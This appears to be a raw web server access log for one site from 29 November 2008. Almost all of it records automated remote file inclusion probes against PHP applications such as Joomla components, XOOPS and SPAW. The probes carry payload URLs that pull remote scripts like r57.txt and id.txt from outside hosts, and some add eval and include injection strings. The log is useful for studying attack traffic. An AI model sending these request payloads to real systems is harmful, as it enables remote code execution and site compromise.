62.44.72.170 - - [29/Nov/2008:09:28:59 -0800] "GET /logs/access_080521.log//core/pdf.php?config[pdf_module]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:29:03 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:29:03 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:29:14 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:29:15 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:29:17 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:29:25 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:30:20 -0800] "GET /logs//load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:30:20 -0800] "GET /logs//load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:30:20 -0800] "GET /load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:30:20 -0800] "GET /load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:31 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:31 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:31 -0800] "GET /logs/access_071219.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:43 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:43 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:43 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:09:30:44 -0800] "GET /logs/access_080709.log/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:09:30:45 -0800] "GET /errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:09:30:45 -0800] "GET /logs/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:46 -0800] "GET /logs/access_071220.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:30:47 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:31:02 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:31:04 -0800] "GET /logs/access_080211.log//multithumb/multithumb.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:31:04 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:31:04 -0800] "GET /logs//multithumb/multithumb.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:31:08 -0800] "GET /logs/access_080207.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:31:14 -0800] "GET /logs/access_080220.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:31:24 -0800] "GET /logs/access_080223.log//multithumb/multithumb.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:31:35 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:31:36 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:31:38 -0800] "GET /?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 200 94718 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:31:56 -0800] "GET /logs/access_080905.log/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:31:58 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94818 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:32:01 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:32:03 -0800] "GET /logs/access_081107.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:32:11 -0800] "GET /logs/access_081103.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:32:15 -0800] "GET /logs/access_081103.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:32:17 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:32:17 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:32:17 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:32:17 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:09:32:20 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.stormpages.com/cindy/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:32:45 -0800] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.205.5 - - [29/Nov/2008:09:33:24 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.212.205.5 - - [29/Nov/2008:09:33:24 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.212.205.5 - - [29/Nov/2008:09:33:25 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:33:27 -0800] "GET /logs/access_080124.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:09:33:29 -0800] "GET /logs/access_080228.log/?sourcedir=http://www.stormpages.com/cindy/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:33:49 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:33:56 -0800] "GET /logs/access_080301.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:33:56 -0800] "GET /logs/access_080524.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:34:28 -0800] "GET /logs/access_080521.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:34:28 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:34:28 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:34:31 -0800] "GET /logs/access_080524.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:34:32 -0800] "GET /logs/access.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:34:36 -0800] "GET /logs/access_080301.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.202.59.141 - - [29/Nov/2008:09:34:45 -0800] "GET /presto/?D=D HTTP/1.0" 200 510 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:34:48 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:34:48 -0800] "GET /logs//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:34:49 -0800] "GET /?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 200 94718 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:34:50 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:34:50 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.202.59.141 - - [29/Nov/2008:09:34:50 -0800] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.dmulk.com"
67.202.59.141 - - [29/Nov/2008:09:34:55 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:35:11 -0800] "GET /logs/access_080301.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:35:11 -0800] "GET /logs/access_080524.log%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:35:12 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:35:13 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.202.59.141 - - [29/Nov/2008:09:35:13 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:35:13 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:35:16 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:35:28 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:35:29 -0800] "GET /?sourcedir=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 200 94704 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:35:31 -0800] "GET /logs/?sourcedir=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 200 75738 "-" "libwww-perl/5.803" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:35:35 -0800] "GET /logs/access_080113.log/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:35:35 -0800] "GET /errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:35:36 -0800] "GET /logs/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:35:37 -0800] "GET /logs/access_081027.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:35:37 -0800] "GET /logs//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:35:38 -0800] "GET /?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 200 94702 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:35:43 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:35:52 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:35:52 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:35:54 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:35:54 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:36:16 -0800] "GET /logs/access_081107.log//?DOCUMENT_ROOT=http://www.irontonforge.com/McN/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:36:25 -0800] "GET /logs//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:36:25 -0800] "GET /logs//components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:36:25 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:36:25 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:36:32 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:36:32 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:36:32 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:36:34 -0800] "GET /logs/access_080109.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.210.117 - - [29/Nov/2008:09:36:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:36:34 -0800] "GET /logs/access_080714.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:36:43 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:46 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:36:46 -0800] "GET /logs/access_080330.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:46 -0800] "GET /logs/access_081008.log%20//purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:36:46 -0800] "GET /main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:36:46 -0800] "GET /logs//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:36:46 -0800] "GET /logs/access_080711.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:46 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:51 -0800] "GET /logs/access_081008.log%20//purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:51 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:36:51 -0800] "GET /pjsfiles/modify.php?installed_config_file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:36:51 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:36:51 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
